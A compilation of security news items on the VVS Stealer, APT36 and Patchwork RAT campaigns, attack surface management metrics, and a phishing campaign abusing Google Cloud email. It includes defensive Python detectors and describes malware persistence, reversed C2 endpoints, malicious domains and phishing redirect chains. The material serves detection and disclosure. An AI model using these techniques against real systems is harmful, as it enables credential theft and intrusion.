Morgan, who was sentenced to 18 months of incarceration shortly after, posted on X in late October 2025, stating she was released “like a month ago” and that “prison was chill enough.” In a statement shared with CNBC, a Trump administration official said Lichtenstein “served significant time on his sentence and is currently on home confinement consistent with statute and Bureau of Prisons policies.” Morgan also acknowledged the news with a message on X, saying, “The best New Years present I could get was finally having my husband home after 4 years of being apart.”


New VVS Stealer Malware Targets Discord Accounts via Obfuscated Python Code

Cybersecurity researchers have disclosed details of a new Python-based information stealer called VVS Stealer (also styled as VVS $tealer) that’s capable of harvesting Discord credentials and tokens. The stealer is said to have been on sale on Telegram as far back as April 2025, according to a report from Palo Alto Networks Unit 42. “VVS stealer’s code is obfuscated by Pyarmor,” researchers Pranay Kumar Chhaparwal and Lee Wei Yeong said. “This tool is used to obfuscate Python scripts to hinder static analysis and signature-based detection.

Pyarmor can be used for legitimate purposes and also leveraged to build stealthy malware.” Advertised on Telegram as the “ultimate stealer,” it’s available for €10 ($11.69) for a weekly subscription. It can also be purchased at different pricing tiers: €20 ($23) for a month, €40 ($47) for three months, €90 ($105) for a year, and €199 ($232) for a lifetime license, making it one of the cheapest stealers for sale. According to a report published by Deep Code in late April 2025, the stealer is believed to be the work of a French-speaking threat actor, who is also active in stealer-related Telegram groups such as Myth Stеaler and Еуes Steаlеr GC. The Pyarmor-protected VVS Stealer malware is distributed as a PyInstaller package.

Once launched, the stealer sets up persistence by adding itself to the Windows Startup folder so that it’s automatically launched after a system reboot. It also displays fake “Fatal Error” pop-up alerts instructing users to restart their computers to resolve an error, while it steals a wide range of data:
- Discord data (tokens and account information)
- Web browser data from Chromium and Firefox (cookies, history, passwords, and autofill information)
- Screenshots

VVS Stealer is also designed to perform Discord injection attacks so as to hijack active sessions on the compromised device. To achieve this, it first terminates the Discord application if it’s already running. Then, it downloads an obfuscated JavaScript payload from a remote server that’s responsible for monitoring network traffic via the Chrome DevTools Protocol (CDP).
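A static triage check for the packaging described above, added here as an example rather than Unit 42’s or the malware author’s code: it looks for the PyInstaller archive cookie and the strings a Pyarmor runtime leaves in a binary, then applies the same check to Startup-folder entries, which is where this stealer persists. The sample bytes and file names are constructed (no real sample is embedded), and the set of file extensions scanned is an assumption.

```python
"""Static triage for PyInstaller-packaged, Pyarmor-protected samples.

Added example, not Unit 42's code. It checks raw file bytes for the
PyInstaller CArchive cookie and for the import/runtime strings Pyarmor leaves
behind, then applies that check to Startup-folder entries. All sample bytes
below are constructed; no real malware is embedded.
"""
from pathlib import Path
from typing import Dict, List, Tuple

# PyInstaller's CArchive cookie magic ("MEI" followed by five control bytes),
# present in every PyInstaller-built executable.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"

# Strings that Pyarmor-obfuscated scripts and their runtime extension carry:
# Pyarmor 8 uses pyarmor_runtime_XXXXXX/__pyarmor__, Pyarmor 7 used pytransform.
PYARMOR_MARKERS = (b"__pyarmor__", b"pyarmor_runtime", b"pytransform")

# Executable/script types worth scanning in a Startup folder (assumption).
SCAN_SUFFIXES = (".exe", ".py", ".pyw", ".pyc")


def scan_bytes(data: bytes) -> Dict[str, object]:
    """Return which packer/obfuscator indicators appear in one file's contents."""
    return {
        "pyinstaller": PYINSTALLER_MAGIC in data,
        "pyarmor": [m.decode() for m in PYARMOR_MARKERS if m in data],
    }


def verdict(indicators: Dict[str, object]) -> str:
    """Collapse indicators into a label; 'pyarmor-pyinstaller' is the VVS pattern."""
    if indicators["pyinstaller"] and indicators["pyarmor"]:
        return "pyarmor-pyinstaller"
    if indicators["pyinstaller"]:
        return "pyinstaller"
    if indicators["pyarmor"]:
        return "pyarmor-script"
    return "clean"


def scan_startup_entries(entries: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Scan (filename -> bytes) pairs and return the non-clean ones in order."""
    findings = []
    for name, data in entries.items():
        if not name.lower().endswith(SCAN_SUFFIXES):
            continue
        label = verdict(scan_bytes(data))
        if label != "clean":
            findings.append((name, label))
    return findings


def scan_startup_folder(folder: Path) -> List[Tuple[str, str]]:
    """Same check over a real directory, e.g. the per-user Startup folder
    %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup."""
    entries = {p.name: p.read_bytes() for p in folder.iterdir() if p.is_file()}
    return scan_startup_entries(entries)


# Constructed sample contents: a blob carrying both the PyInstaller cookie and
# Pyarmor runtime names, a plain PyInstaller build, and a harmless batch file.
SAMPLE_ENTRIES = {
    "Update.exe": (b"MZ" + b"\x00" * 64
                   + b"pyarmor_runtime_000000/pyarmor_runtime.pyd" + b"\x00" * 32
                   + b"__pyarmor__" + b"\x00" * 16 + PYINSTALLER_MAGIC + b"\x00" * 32),
    "tool.exe": b"MZ" + b"\x00" * 64 + PYINSTALLER_MAGIC + b"\x00" * 32,
    "sync.bat": b"@echo off\r\nstart notepad.exe\r\n",
}

if __name__ == "__main__":
    for name, label in scan_startup_entries(SAMPLE_ENTRIES):
        print(f"{name}: {label}")
```

A PyInstaller build alone is not malicious (plenty of legitimate tools ship that way), which is why the verdict separates the plain case from the Pyarmor-plus-PyInstaller combination; on a real host, run scan_startup_folder against the per-user and all-users Startup directories and treat the combination as a triage lead, not a conviction.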

“Malware authors are increasingly leveraging advanced obfuscation techniques to evade detection by cybersecurity tools, making their malicious software harder to analyze and reverse-engineer,” the company said. “Because Python is easy for malware authors to use and the complex obfuscation used by this threat, the result is a highly effective and stealthy malware family.” The disclosure comes as Hudson Rock detailed how threat actors are using information stealers to siphon administrative credentials from legitimate businesses and then leverage their infrastructure to distribute the malware via ClickFix-style campaigns, creating a self-perpetuating loop. “A significant percentage of domains hosting these campaigns are not malicious infrastructure set up by attackers, but legitimate businesses whose administrative credentials were stolen by the very infostealers they are now distributing,” the company said.

Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts. “The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” CYFIRMA said in a technical report. Transparent Tribe, also called APT36, is a hacking group that’s known for mounting cyber espionage campaigns against Indian organizations. Assessed to be of Pakistani origin, the state-sponsored adversary has been active since at least 2013.

The threat actor boasts an ever-evolving arsenal of RATs to realize its goals. Some of the trojans put to use by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using “mshta.exe” that decrypts and loads the final RAT payload directly in memory.

In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users’ suspicion. “After decoding logic is established, the HTA leverages ActiveX objects, particularly WScript.Shell, to interact with the Windows environment,” CYFIRMA noted. “This behavior demonstrates environment profiling and runtime manipulation, ensuring compatibility with the target system and increasing execution reliability, techniques commonly observed in malware abusing ‘mshta.exe.’” A noteworthy aspect of the malware is its ability to adapt its persistence method based on the antivirus solutions installed on the infected machine:
- If Kaspersky is detected, it creates a working directory under “C:\Users\Public\core\,” writes an obfuscated HTA payload to disk, and establishes persistence by dropping a LNK file in the Windows Startup folder that, in turn, launches the HTA script using “mshta.exe”
- If Quick Heal is detected, it establishes persistence by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload to disk, and then calling it using the batch script
- If Avast, AVG, or Avira is detected, it directly copies the payload into the Startup directory and executes it
- If no recognized antivirus solution is detected, it falls back to a combination of batch file execution, registry-based persistence, and payload deployment prior to launching the batch script

The second HTA file includes a DLL named “iinneldc.dll” that functions as a fully-featured RAT, supporting remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control. “APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat, with a sustained focus on intelligence collection targeting Indian government entities, educational institutions, and other strategically relevant sectors,” the cybersecurity company said.

In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader, which then drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access. The shortcut is designed to execute an obfuscated command using cmd.exe to retrieve an MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co[.]in”), which is responsible for initiating a series of actions:
- Extract and display a decoy PDF document to the victim
- Decode and write DLL files to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll”
- Drop “PcDirvs.exe” to the same location and execute it after a delay of 10 seconds
- Establish persistence by creating “PcDirvs.hta,” which contains Visual Basic Script that makes Registry modifications to launch “PcDirvs.exe” after every system startup

It’s worth pointing out that the lure PDF displayed is a legitimate advisory issued by the National Cyber Emergency Response Team of Pakistan (PKCERT) in 2024 about a fraudulent WhatsApp message campaign targeting government entities in Pakistan with a malicious WinRAR file that infects systems with malware. The DLL “wininet.dll” connects to hard-coded command-and-control (C2) infrastructure hosted at dns.wmiprovider[.]com, a domain registered in mid-April 2025.

The C2 associated with the activity is currently inactive, but the Windows Registry-based persistence ensures that the threat can be resurrected at any time in the future. “The DLL implements multiple HTTP GET–based endpoints to establish communication with the C2 server, perform updates, and retrieve attacker-issued commands,” CYFIRMA said. “To evade static string detection, the endpoint characters are intentionally stored in reversed order.” The list of endpoints is as follows:
- /retsiger (register), to register the infected system with the C2 server
- /taebtraeh (heartbeat), to beacon its presence to the C2 server
- /dnammoc_teg (get_command), to run arbitrary commands via “cmd.exe”
- /dnammocmvitna (antivmcommand), to query or set an anti-VM status and likely adjust behavior

The DLL also queries installed antivirus products on the victim system, turning it into a potent tool capable of conducting reconnaissance and gathering sensitive information.

Patchwork Linked to New StreamSpy Trojan

The disclosure comes weeks after Patchwork (aka Dropping Elephant or Maha Grass), a hacking group believed to be of Indian origin, was linked to attacks targeting Pakistan’s defense sector with a Python-based backdoor that’s distributed via phishing emails containing ZIP files, according to security researcher Idan Tarab.
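Returning to the reversed endpoint names of the APT36 “wininet.dll” listed above: reversing strings defeats a signature on the literal command word, but a log-side check can simply undo the reversal. The script below is added here as an example and is neither CYFIRMA’s nor the malware’s code. The proxy log layout, the log lines and the source IPs are constructed; the command names and the C2 hostname are the ones the report gives.

```python
"""Decode APT36-style reversed C2 endpoint names in proxy logs.

Added example, not CYFIRMA's code. The wininet.dll described above stores
its HTTP endpoint names reversed (/retsiger for register) to defeat static
string matching; this script undoes that by extracting each request path,
reversing it and matching the result against the plain command names. The
log format and log lines below are constructed; the C2 hostname is the one
named in the report.
"""
import re
from collections import Counter
from typing import Iterable, Iterator, Optional, Tuple

# Plain-text command names from the report; the DLL stores them reversed.
KNOWN_COMMANDS = ("register", "heartbeat", "get_command", "antivmcommand")

# Reverse each name once so a log path can be looked up directly.
REVERSED_ENDPOINTS = {"/" + cmd[::-1]: cmd for cmd in KNOWN_COMMANDS}

# Hard-coded C2 host from the report (defanging removed for matching).
C2_HOST = "dns.wmiprovider.com"

# Assumed proxy log layout: "<timestamp> <src_ip> <method> <host> <path> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\S+) (\d{3})$")

Hit = Tuple[str, str, str, Optional[str], str]  # src, host, path, command, reason


def decode_path(path: str) -> Optional[str]:
    """Return the plain command if the path (minus query string) is a reversed name."""
    return REVERSED_ENDPOINTS.get(path.split("?", 1)[0])


def scan_log(lines: Iterable[str]) -> Iterator[Hit]:
    """Yield one hit per line that decodes to a command or talks to the known C2."""
    for line in lines:
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # skip lines that do not fit the assumed layout
        _ts, src, _method, host, path, _status = match.groups()
        command = decode_path(path)
        if command:
            yield (src, host, path, command, "reversed-endpoint")
        elif host == C2_HOST:
            yield (src, host, path, None, "known-c2-host")


def summarize(lines: Iterable[str]) -> dict:
    """Aggregate hits per source IP and per decoded command for a report."""
    hits = list(scan_log(lines))
    return {
        "total": len(hits),
        "by_source": dict(Counter(h[0] for h in hits)),
        "commands": dict(Counter(h[3] for h in hits if h[3])),
    }


# Constructed log: one host beaconing through the reversed endpoints plus an
# unrelated client whose forward-spelled /register must not match.
SAMPLE_LOG = """\
2025-12-01T10:00:01Z 10.0.0.5 GET dns.wmiprovider.com /retsiger?id=ABC123 200
2025-12-01T10:00:31Z 10.0.0.5 GET dns.wmiprovider.com /taebtraeh 200
2025-12-01T10:01:01Z 10.0.0.5 GET dns.wmiprovider.com /dnammoc_teg 200
2025-12-01T10:01:02Z 10.0.0.5 GET dns.wmiprovider.com /update 200
2025-12-01T10:01:03Z 10.0.0.9 GET www.example.com /register 200
2025-12-01T10:01:04Z 10.0.0.9 GET www.example.com /index.html 200
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit)
    print(summarize(SAMPLE_LOG.splitlines()))
```

The path match is exact on purpose: a forward-spelled /register from an unrelated web app is not a hit, while the same host reaching /update is still flagged through the C2 hostname even though that path is not one of the four reversed commands.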

Present within the archive is an MSBuild project that, when executed via “msbuild.exe,” deploys a dropper to ultimately install and launch the Python RAT. The malware is equipped to contact a C2 server and run remote Python modules, execute commands, and upload/download files. “This campaign represents a modernized, highly obfuscated Patchwork APT toolkit blending MSBuild LOLBin loaders, PyInstaller‑modified Python runtimes, marshalled bytecode implants, geofencing, randomized PHP C2 endpoints, [and] realistic persistence mechanisms,” Tarab said. As of December 2025, Patchwork has also been associated with a previously undocumented trojan named StreamSpy, which uses WebSocket and HTTP protocols for C2 communication.

While the WebSocket channel is used to receive instructions and transmit the execution results, HTTP is leveraged for file transfers. StreamSpy’s links to Patchwork, per QiAnXin, stem from its similarities to Spyder, a variant of another backdoor named WarHawk that’s attributed to SideWinder. Patchwork’s use of Spyder dates all the way back to 2023. Distributed via ZIP archives (“OPS-VII-SIR.zip”) hosted on “firebasescloudemail[.]com,” the malware (“Annexure.exe”) can harvest system information, establish persistence via the Windows Registry, a scheduled task, or a LNK file in the Startup folder, and communicate with the C2 server using HTTP and WebSocket.

The list of supported commands is below:
- F1A5C3, to download a file and open it using ShellExecuteExW
- B8C1D2, to set the shell for command execution to cmd
- E4F5A6, to set the shell for command execution to PowerShell
- FL_SH1, to close all shells
- C9E3D4, E7F8A9, H1K4R8, C0V3RT, to download encrypted ZIP files from the C2 server, extract them, and open them using ShellExecuteExW
- F2B3C4, to gather information about the file system and all disks connected to the device
- D5E6F7, to perform file upload and download
- A8B9C0, to perform file upload
- D1E2F3, to delete a file
- A4B5C6, to rename a file
- D7E8F9, to enumerate a specific folder

QiAnXin said the StreamSpy download site also hosts Spyder variants with extensive data collection features, adding that the malware’s digital signature exhibits correlations with a different Windows RAT called ShadowAgent attributed to the DoNot Team (aka Brainworm). Interestingly, 360 Threat Intelligence Center flagged the same “Annexure.exe” executable as ShadowAgent in November 2025. “The emergence of the StreamSpy trojan and Spyder variants from the Maha Grass group indicates that the group is continuously iterating its arsenal of attack tools,” the Chinese security vendor said. “In the StreamSpy trojan, attackers attempt to use WebSocket channels for command issuance and result feedback to evade detection and censorship of HTTP traffic.

Additionally, the correlated samples further confirm that the Maha Grass and DoNot attack groups have some connections in terms of resource sharing.”

The ROI Problem in Attack Surface Management

Attack Surface Management (ASM) tools promise reduced risk. What they usually deliver is more information. Security teams deploy ASM, asset inventories grow, alerts start flowing, and dashboards fill up. There is visible activity and measurable output.

But when leadership asks a simple question, “Is this reducing incidents?” the answer is often unclear. This gap between effort and outcome is the core ROI problem in attack surface management, especially when ROI is measured primarily through asset counts instead of risk reduction.

The Promise vs. The Proof

Most ASM programs are built around a reasonable idea: you can’t protect what you don’t know exists. As a result, teams focus on discovery: domains and subdomains, IPs and cloud resources, third-party infrastructure, and transient or short-lived assets. Over time, counts increase. Dashboards are trending upward.

Coverage improves. But none of those metrics directly answer whether the organization is actually safer. In many cases, teams end up busier without feeling less exposed.

Why ASM Feels Busy but Not Effective

ASM tends to optimize for coverage because coverage is easy to measure: more assets discovered, more changes detected, and more alerts generated.

Each of those feels like progress. But they mostly measure inputs, not outcomes. In practice, teams experience:
- Alert fatigue
- Long backlogs of “known but unresolved” assets
- Repeated ownership confusion
- Exposure that lingers for months

The work is real. The risk reduction is harder to see.

The Measurement Gap

One reason ASM ROI is hard to prove is that most attack surface metrics focus on what the system can see, not what the organization actually improves. Common attack surface management metrics include:
- Number of assets
- Number of changes

More meaningful attack surface metrics are rarely tracked:
- How fast risky assets get owned
- How long dangerous exposure persists
- Whether attack paths actually shrink over time

Asset inventory remains foundational to measuring the external attack surface. Without broad discovery, it’s impossible to understand exposure at all. The gap appears when discovery metrics aren’t paired with measurements that show whether risk is actually being reduced.

Without outcome-oriented measurements, ASM becomes difficult to defend during budget reviews, even when everyone agrees that asset visibility is necessary.

What Would Meaningful ROI Look Like?

Instead of asking, “How many assets did we discover?” a more useful question is, “How much faster and safer did we get at handling exposure?” That reframing shifts ROI from visibility to response quality and exposure duration, things that correlate much more closely with real-world risk.

Three Outcome Metrics That Actually Matter

1. Mean Time to Asset Ownership

How long does it take to answer the basic question: “Who owns this?” Assets without clear ownership:
- Linger longer
- Get patched later
- Are more likely to be forgotten entirely

Reducing time-to-ownership shortens the window where exposure exists without accountability. It’s one of the clearest signals that ASM findings are turning into action.

2. Reduction in Unauthenticated, State-Changing Endpoints

Not all assets matter equally.

Tracking how many external endpoints can change state, how many require authentication, and how those numbers change over time provides a much stronger signal of whether the attack surface is shrinking where it counts. An environment with thousands of static assets but few unauthenticated, state-changing paths is meaningfully safer than one with fewer assets but many risky entry points.

3. Time to Decommission After Ownership Loss

Exposure often persists after:
- Team changes
- Application deprecation
- Vendor migrations
- Reorgs

Measuring how quickly assets are retired once ownership disappears is one of the strongest indicators of long-term hygiene and one of the least commonly tracked.

If abandoned assets stick around indefinitely, discovery alone isn’t reducing risk.

What This Looks Like in Practice

Abstract metrics are easy to agree with and hard to operationalize. The goal isn’t a new dashboard or a different set of alerts, but a shift in what’s made visible: ownership gaps, exposure duration, and unresolved risk that would otherwise blend into asset counts. Rather than emphasizing total asset count, this view surfaces:
- Which assets are owned
- Which are unresolved
- How long ownership has been unclear

The goal isn’t more alerts but faster resolution.
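As an added example (not Sprocket Security’s code), the three outcome metrics above computed over a small, constructed asset inventory. The record fields, names and dates are assumptions about what an ASM export would carry; the point is that each metric needs only a handful of timestamps and two booleans per asset, none of which is the asset count.

```python
"""Compute the three ASM outcome metrics from a constructed inventory.

Added example, not Sprocket Security's code. It reads an asset inventory in
the shape an ASM export might take (the field names are assumptions) and
reports mean time to ownership, unauthenticated state-changing endpoints per
quarter, and time to decommission after ownership loss. The inventory is
constructed for illustration.
"""
from dataclasses import dataclass
from datetime import date
from statistics import mean
from typing import List, Optional, Sequence


@dataclass
class Asset:
    name: str
    discovered: date
    owned: Optional[date]           # date an owner was confirmed, None if still unowned
    owner_lost: Optional[date]      # date the owner left / the app was deprecated
    decommissioned: Optional[date]  # date the asset was retired
    authenticated: bool             # endpoint requires authentication
    state_changing: bool            # endpoint can change state (not read-only)


def mean_time_to_ownership(assets: Sequence[Asset], as_of: date) -> dict:
    """Days from discovery to confirmed owner; unowned assets keep accruing."""
    owned = [(a.owned - a.discovered).days for a in assets if a.owned]
    unowned = [(as_of - a.discovered).days for a in assets if not a.owned]
    return {
        "mean_days_to_owner": round(mean(owned), 1) if owned else None,
        "still_unowned": len(unowned),
        "oldest_unowned_days": max(unowned, default=0),
    }


def is_live(a: Asset, as_of: date) -> bool:
    """An asset counts on a snapshot date if discovered by then and not yet retired."""
    return a.discovered <= as_of and (a.decommissioned is None or a.decommissioned > as_of)


def risky_endpoint_count(assets: Sequence[Asset], as_of: date) -> int:
    """Live endpoints that are both unauthenticated and state-changing."""
    return sum(1 for a in assets
               if is_live(a, as_of) and not a.authenticated and a.state_changing)


def risky_endpoint_trend(assets: Sequence[Asset], quarter_ends: Sequence[date]) -> List[tuple]:
    """(quarter_end, count, change since previous quarter) for each snapshot date."""
    counts = [risky_endpoint_count(assets, q) for q in quarter_ends]
    return [(q.isoformat(), c, c - counts[i - 1] if i else 0)
            for i, (q, c) in enumerate(zip(quarter_ends, counts))]


def time_to_decommission(assets: Sequence[Asset]) -> dict:
    """Days between ownership loss and retirement; orphans are still live."""
    retired = [(a.decommissioned - a.owner_lost).days
               for a in assets if a.owner_lost and a.decommissioned]
    orphans = [a.name for a in assets if a.owner_lost and not a.decommissioned]
    return {
        "mean_days_to_retire": round(mean(retired), 1) if retired else None,
        "orphans_still_live": orphans,
    }


# Constructed inventory: five external assets across two quarters.
INVENTORY = [
    Asset("api-gw", date(2025, 7, 1), date(2025, 7, 3), None, None, True, True),
    Asset("legacy-upload", date(2025, 7, 10), date(2025, 8, 19), date(2025, 10, 1), date(2025, 11, 15), False, True),
    Asset("marketing-cms", date(2025, 8, 1), None, None, None, False, True),
    Asset("old-jenkins", date(2025, 6, 15), date(2025, 6, 20), date(2025, 9, 1), None, False, True),
    Asset("static-docs", date(2025, 7, 5), date(2025, 7, 6), None, None, False, False),
]
QUARTER_ENDS = [date(2025, 9, 30), date(2025, 12, 31)]

if __name__ == "__main__":
    print(mean_time_to_ownership(INVENTORY, QUARTER_ENDS[-1]))
    print(risky_endpoint_trend(INVENTORY, QUARTER_ENDS))
    print(time_to_decommission(INVENTORY))
```

On this inventory the asset count is flat across both quarters, yet the risky-endpoint count drops from 3 to 2 because legacy-upload was retired, while old-jenkins shows up as an orphan that lost its owner in September and is still live; that second fact is exactly what an asset total hides.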

Turning ASM into a Control

ASM doesn’t struggle because teams aren’t working hard enough. It struggles because effort isn’t consistently tied to outcomes that leadership cares about. Reframing ROI around speed, ownership, and exposure duration makes it possible to show real progress, even if the raw asset count never changes.

In many cases, the most meaningful wins come from making the attack surface boring again.

A Concrete Starting Point

One way to pressure-test outcome-based ASM metrics is to make asset visibility broadly accessible across teams, not gated behind tooling silos. We’ve found that when engineering, security, and infrastructure teams can all see ownership gaps and exposure duration, resolution speeds up without adding more alerts. That thinking led us to release a community edition of our ASM platform that exposes asset discovery and ownership visibility without cost or limits.

The goal isn’t to replace existing tools, but to give teams a way to measure whether exposure is actually shrinking over time. If you want to pressure-test the ROI of your ASM program, try this: ignore how many assets you have. Instead, ask:
- How long do risky assets stay unowned?
- How many unauthenticated, state-changing paths exist today vs. last quarter?
- How quickly do abandoned assets disappear?

If those answers aren’t improving, more discovery won’t change the outcome.

Conclusion: Measure What Actually Changes Risk

Attack surface management becomes defensible when it’s measured by what changes, not just what accumulates. Discovery will always matter.

Visibility will always matter when measuring the attack surface. But neither guarantees that exposure is being reduced, only that it’s being observed. Attack surface management ROI shows up when risky assets get confirmed as owned faster, when dangerous paths disappear sooner, and when abandoned infrastructure doesn’t linger indefinitely. Asset inventory provides the necessary breadth; outcome-oriented metrics provide the depth needed to understand real risk reduction.

At Sprocket Security, we try to think about attack surface management not only in terms of how many assets exist, but also how long meaningful exposure persists and how quickly it gets resolved. What matters most is that attack surface metrics make progress visible, not just inventory growth. If an attack surface management program can’t answer whether exposure is shrinking over time, it’s hard to argue that it’s doing more than reporting the problem. Note: This article was expertly written and contributed by Topher Lyons, Solutions Engineer at Sprocket Security.

This article is a contributed piece from one of our valued partners.

Cybercriminals Abuse Google Cloud Email Feature in Multi-Stage Phishing Campaign

Cybersecurity researchers have disclosed details of a phishing campaign in which the attackers impersonate legitimate Google-generated messages by abusing Google Cloud’s Application Integration service to distribute emails. The activity, Check Point said, takes advantage of the trust associated with Google Cloud infrastructure to send the messages from a legitimate email address (“noreply-application-integration@google[.]com”) so that they can bypass traditional email security filters and have a better chance of landing in users’ inboxes. “The emails mimic routine enterprise notifications such as voicemail alerts and file access or permission requests, making them appear normal and trustworthy to recipients,” the cybersecurity company said. Attackers have been observed sending 9,394 phishing emails targeting approximately 3,200 customers over a 14-day period observed in December 2025, with the affected organizations located in the U.S., Asia-Pacific, Europe, Canada, and Latin America.

At the heart of the campaign is the abuse of Application Integration’s “Send Email” task, which allows users to send custom email notifications from an integration. Google notes in its support documentation that a maximum of 30 recipients can be added to the task. The fact that these emails can be sent to arbitrary addresses shows how the threat actor turned a legitimate automation capability to its advantage: because the messages genuinely originate from Google-owned mail infrastructure, they pass SPF, DKIM and DMARC checks outright, with no spoofing required, so sender authentication alone cannot flag them. “To further increase trust, the emails closely followed Google notification style and structure, including familiar formatting and language,” Check Point said.

“The lures commonly referenced voicemail messages or claims that the recipient had been granted access to a shared file or document, such as access to a ‘Q4’ file, prompting recipients to click embedded links and take immediate action.” The attack chain is a multi-stage redirection flow that commences when an email recipient clicks on a link hosted on storage.cloud.google[.]com, another trusted Google Cloud service, a choice that further lowers user suspicion and lends the link a veneer of legitimacy. The link then redirects the user to content served from googleusercontent[.]com, presenting them with a fake CAPTCHA or image-based verification that acts as a barrier by blocking automated scanners and security tools from scrutinizing the attack infrastructure, while allowing real users to pass through. Once the validation phase is complete, the user is taken to a fake Microsoft login page that’s hosted on a non-Microsoft domain, ultimately stealing any credentials entered by the victims.
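An added example, not Check Point’s code, of the content-based triage these messages call for: since Google really sent them, SPF, DKIM and DMARC all pass and tell a filter nothing, so the check keys on the automation sender address, the storage.cloud.google.com link, the lure wording, and on a redirect chain that ends at a sign-in page off Microsoft’s login domains. The message, the hop list, the extra storage.googleapis.com host, the Microsoft login host list and the final non-Microsoft hostname are constructed assumptions.

```python
"""Content-based triage for Application Integration phishing mail.

Added example, not Check Point's code. Because these messages are genuinely
sent by Google, SPF, DKIM and DMARC pass and sender authentication tells a
filter nothing; detection has to key on content: the automation sender
address, links into storage.cloud.google.com, lure wording, and a redirect
chain that ends on a sign-in page outside Microsoft's login domains. The
message, hop list and non-Microsoft hostname below are constructed.
"""
import re
from email import message_from_string
from email.message import Message
from typing import Dict, List, Sequence, Tuple
from urllib.parse import urlparse

AUTOMATION_SENDER = "noreply-application-integration@google.com"
GCS_HOSTS = {"storage.cloud.google.com", "storage.googleapis.com"}  # second is an assumption
MS_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}
LURE_WORDS = ("voicemail", "shared a file", "granted access", "permission request")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def extract_urls(msg: Message) -> List[str]:
    """Collect URLs from every text part of the message."""
    urls: List[str] = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True) or b""
            urls.extend(URL_RE.findall(payload.decode("utf-8", "replace")))
    return urls


def triage_message(raw: str) -> Dict[str, object]:
    """Score one RFC 822 message; two or more reasons marks it suspicious."""
    msg = message_from_string(raw)
    sender = msg.get("From", "").lower()
    auth = msg.get("Authentication-Results", "").lower()
    urls = extract_urls(msg)
    text = (msg.get("Subject", "") + " " + " ".join(
        (p.get_payload(decode=True) or b"").decode("utf-8", "replace")
        for p in msg.walk() if p.get_content_type() == "text/plain")).lower()
    reasons = []
    if AUTOMATION_SENDER in sender:
        reasons.append("automation-sender")
    if {urlparse(u).hostname for u in urls} & GCS_HOSTS:
        reasons.append("gcs-link")
    if any(w in text for w in LURE_WORDS):
        reasons.append("lure-wording")
    return {
        "dmarc_pass": "dmarc=pass" in auth,  # expected True here, and useless alone
        "reasons": reasons,
        "urls": urls,
        "suspicious": len(reasons) >= 2,
    }


def classify_chain(hops: Sequence[Tuple[str, str]]) -> str:
    """Classify a followed link given its (hostname, page title) hops: Google-hosted
    intermediaries that end on a sign-in page off Microsoft's domains are the pattern."""
    if not hops:
        return "empty"
    final_host, final_title = hops[-1]
    title = final_title.lower()
    looks_like_login = "sign in" in title or "microsoft" in title
    via_google = any(h.endswith(("google.com", "googleusercontent.com")) for h, _ in hops[:-1])
    if looks_like_login and final_host in MS_LOGIN_HOSTS:
        return "microsoft-login"
    if looks_like_login and via_google:
        return "credential-phish"
    return "benign"


# Constructed message: authentication passes because Google really sent it.
SAMPLE_MAIL = """\
From: Google Cloud <noreply-application-integration@google.com>
To: jane@example.com
Subject: New voicemail received
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=google.com; dkim=pass header.d=google.com; dmarc=pass header.from=google.com
Content-Type: text/plain; charset="utf-8"

You have a new voicemail. Listen: https://storage.cloud.google.com/notify-1234/voice.html
"""

# Constructed hops seen when following that link (the last hostname is made up).
SAMPLE_CHAIN = [
    ("storage.cloud.google.com", "Redirecting"),
    ("lh3.googleusercontent.com", "Verify you are human"),
    ("m365-secure-verify.example.net", "Sign in to your account"),
]

if __name__ == "__main__":
    print(triage_message(SAMPLE_MAIL))
    print(classify_chain(SAMPLE_CHAIN))
```

In production the hop list would come from a detonation sandbox or URL-rewriting proxy that follows the link with a real browser, since the image CAPTCHA stage is designed to stop headless fetchers before they ever reach the final host.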

In response to the findings, Google has blocked the phishing efforts that abuse the email notification feature within Google Cloud Application Integration, adding that it’s taking more steps to prevent further misuse. Check Point’s analysis has revealed that the campaign has primarily targeted manufacturing, technology, financial, professional services, and retail sectors, although other industry verticals, including media, education, healthcare, energy, government, travel, and transportation, have been singled out. “These sectors commonly rely on automated notifications, shared documents, and permission-based workflows, making Google-branded alerts especially convincing,” it added. “This campaign highlights how attackers can misuse legitimate cloud automation and workflow features to distribute phishing at scale without traditional spoofing.”

Update: Both xorlab and Ravenmail have disclosed details of the credential harvesting campaign, with the former noting that the attacks are also being used to carry out OAuth consent phishing, as well as to host the fake login pages on Amazon Web Services (AWS) S3 buckets.

“The attackers trick victims into granting a malicious Azure AD application access to their cloud resources – gaining access to Azure subscriptions, VMs, storage, and databases via delegated permissions that persist through access and refresh tokens,” xorlab said. “Each hop uses trusted infrastructure – Google, Microsoft, AWS – making the attack difficult to detect or block at any single point. Regardless of the entry point, victims eventually land on the Microsoft 365 login page, revealing the attackers’ primary target: M365 credentials.”

